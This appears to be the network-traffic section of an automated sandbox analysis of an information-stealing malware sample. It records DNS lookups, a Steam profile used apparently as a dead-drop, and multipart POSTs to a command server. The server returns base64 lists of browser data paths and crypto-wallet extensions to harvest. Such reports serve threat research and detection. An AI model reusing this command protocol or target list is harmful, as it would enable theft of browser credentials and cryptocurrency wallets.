                                                                                      Aug 29, 2024 20:50:01.062777996 CEST4435996094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:50:01.735766888 CEST4435996094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:50:01.735831022 CEST4435996094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:50:01.735932112 CEST59960443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:50:01.736802101 CEST59960443192.168.2.594.130.188.148
                                                                                      Aug 29, 2024 20:50:01.736815929 CEST4435996094.130.188.148192.168.2.5
                                                                                      Aug 29, 2024 20:50:02.017688990 CEST5996180192.168.2.595.164.119.162
                                                                                      Aug 29, 2024 20:50:02.022804022 CEST805996195.164.119.162192.168.2.5
                                                                                      Aug 29, 2024 20:50:02.022907019 CEST5996180192.168.2.595.164.119.162
                                                                                      Aug 29, 2024 20:50:02.024888992 CEST5996180192.168.2.595.164.119.162
                                                                                      Aug 29, 2024 20:50:02.024930954 CEST5996180192.168.2.595.164.119.162
                                                                                      Aug 29, 2024 20:50:02.029927015 CEST805996195.164.119.162192.168.2.5
                                                                                      Aug 29, 2024 20:50:02.030119896 CEST805996195.164.119.162192.168.2.5
                                                                                      Aug 29, 2024 20:50:02.030128956 CEST805996195.164.119.162192.168.2.5
                                                                                      Aug 29, 2024 20:50:02.030155897 CEST805996195.164.119.162192.168.2.5
                                                                                      Aug 29, 2024 20:50:03.661551952 CEST805996195.164.119.162192.168.2.5
                                                                                      Aug 29, 2024 20:50:03.661659002 CEST5996180192.168.2.595.164.119.162
                                                                                      Aug 29, 2024 20:50:03.661787987 CEST5996180192.168.2.595.164.119.162
                                                                                      Aug 29, 2024 20:50:03.667243004 CEST805996195.164.119.162192.168.2.5

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Aug 29, 2024 20:46:57.295000076 CEST6245553192.168.2.51.1.1.1
                                                                                      Aug 29, 2024 20:46:57.321804047 CEST53624551.1.1.1192.168.2.5
                                                                                      Aug 29, 2024 20:47:38.801476002 CEST5350743162.159.36.2192.168.2.5
                                                                                      Aug 29, 2024 20:47:40.248366117 CEST53509071.1.1.1192.168.2.5
                                                                                      Aug 29, 2024 20:49:20.473695040 CEST5533453192.168.2.51.1.1.1
                                                                                      Aug 29, 2024 20:49:20.480823994 CEST53553341.1.1.1192.168.2.5
                                                                                      Aug 29, 2024 20:50:01.747929096 CEST6410753192.168.2.51.1.1.1
                                                                                      Aug 29, 2024 20:50:02.009289980 CEST53641071.1.1.1192.168.2.5

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Aug 29, 2024 20:46:57.295000076 CEST192.168.2.51.1.1.10x5f91Standard query (0)gCmUfnfZJOKMjo.gCmUfnfZJOKMjoA (IP address)IN (0x0001)false
                                                                                      Aug 29, 2024 20:49:20.473695040 CEST192.168.2.51.1.1.10xdc43Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                      Aug 29, 2024 20:50:01.747929096 CEST192.168.2.51.1.1.10x2fbfStandard query (0)stadiatechnologies.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Aug 29, 2024 20:46:57.321804047 CEST1.1.1.1192.168.2.50x5f91Name error (3)gCmUfnfZJOKMjo.gCmUfnfZJOKMjononenoneA (IP address)IN (0x0001)false
                                                                                      Aug 29, 2024 20:49:20.480823994 CEST1.1.1.1192.168.2.50xdc43No error (0)steamcommunity.com23.197.127.21A (IP address)IN (0x0001)false
                                                                                      Aug 29, 2024 20:50:02.009289980 CEST1.1.1.1192.168.2.50x2fbfNo error (0)stadiatechnologies.com95.164.119.162A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • steamcommunity.com
                                                                                      • 94.130.188.148
                                                                                      • stadiatechnologies.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.55996195.164.119.162802260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Aug 29, 2024 20:50:02.024888992 CEST315OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: stadiatechnologies.com
                                                                                      Content-Length: 3205
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Aug 29, 2024 20:50:02.024930954 CEST3205OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 41 46 49 49 44 48 49 44 47 48 49 45 43 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64
                                                                                      Data Ascii: ------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------KFCAFIIDHIDGHIECGDGIContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------KFCAFIIDHIDGHI


                                                                                      HTTPS Proxied Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.55993723.197.127.214432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:21 UTC119OUTGET /profiles/76561199761128941 HTTP/1.1
                                                                                      Host: steamcommunity.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:21 UTC1870INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                      Cache-Control: no-cache
                                                                                      Date: Thu, 29 Aug 2024 18:49:21 GMT
                                                                                      Content-Length: 34735
                                                                                      Connection: close
                                                                                      Set-Cookie: sessionid=d5508176add0422e08519376; Path=/; Secure; SameSite=None
                                                                                      Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                      2024-08-29 18:49:21 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                      2024-08-29 18:49:21 UTC10062INData Raw: 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72
                                                                                      Data Ascii: troyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div r
                                                                                      2024-08-29 18:49:21 UTC10159INData Raw: 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 44 5f 55
                                                                                      Data Ascii: nity.akamai.steamstatic.com\/&quot;,&quot;COMMUNITY_CDN_ASSET_URL&quot;:&quot;https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/&quot;,&quot;STORE_CDN_URL&quot;:&quot;https:\/\/store.akamai.steamstatic.com\/&quot;,&quot;PUBLIC_SHARED_U


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.55993894.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:22 UTC214OUTGET / HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:23 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:23 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.55993994.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:23 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----AAKEGIJEHJDGDHJKJKKJ
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 254
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:23 UTC254OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 34 46 45 38 39 31 44 42 45 41 32 30 33 37 39 30 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 45 47 49 4a 45 48 4a 44 47 44 48 4a 4b 4a 4b 4b 4a 2d 2d 0d 0a
                                                                                      Data Ascii: ------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="hwid"2E4FE891DBEA20379026-a33c7340-61ca------AAKEGIJEHJDGDHJKJKKJContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------AAKEGIJEHJDGDHJKJKKJ--
                                                                                      2024-08-29 18:49:24 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:24 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:24 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 7c 31 7c 31 7c 31 7c 31 7c 31 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 3a1|1|1|1|a9a61d3e47c649c77fe9d5f87631f194|1|1|1|1|1|50000|10


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.55994094.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:25 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------KEBKJDBAAKJDGCBFHCFCContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------KEBKJDBAAKJDGCBFHCFCContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------KEBKJDBAAKJDGCBFHCFCCont
                                                                                      2024-08-29 18:49:25 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:25 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                      Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.55994194.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:26 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----EBFHJEGDAFHIJKECFBKJ
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 331
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 46 48 4a 45 47 44 41 46 48 49 4a 4b 45 43 46 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------EBFHJEGDAFHIJKECFBKJContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------EBFHJEGDAFHIJKECFBKJCont
                                                                                      2024-08-29 18:49:27 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:27 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:27 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                      Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.55994294.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:27 UTC306OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 332
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      2024-08-29 18:49:27 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 61 36 31 64 33 65 34 37 63 36 34 39 63 37 37 66 65 39 64 35 66 38 37 36 33 31 66 31 39 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 38 33 65 34 36 35 65 33 65 38 66 65 62 36 63 62 38 30 36 36 39 30 62 39 38 63 39 62 66 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 46 42 4b 46 43 46 42 46 49 44 47 43 47 44 48 4a 0d 0a 43 6f 6e 74
                                                                                      Data Ascii: ------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="token"a9a61d3e47c649c77fe9d5f87631f194------KKFCFBKFCFBFIDGCGDHJContent-Disposition: form-data; name="build_id"283e465e3e8feb6cb806690b98c9bf31------KKFCFBKFCFBFIDGCGDHJCont
                                                                                      2024-08-29 18:49:28 UTC158INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Thu, 29 Aug 2024 18:49:28 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      2024-08-29 18:49:28 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.55994394.130.188.1484432260C:\Users\user\AppData\Local\Temp\271973\Tenant.pif
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-08-29 18:49:29 UTC307OUTPOST / HTTP/1.1
                                                                                      Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                      Host: 94.130.188.148
                                                                                      Content-Length: 6797
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
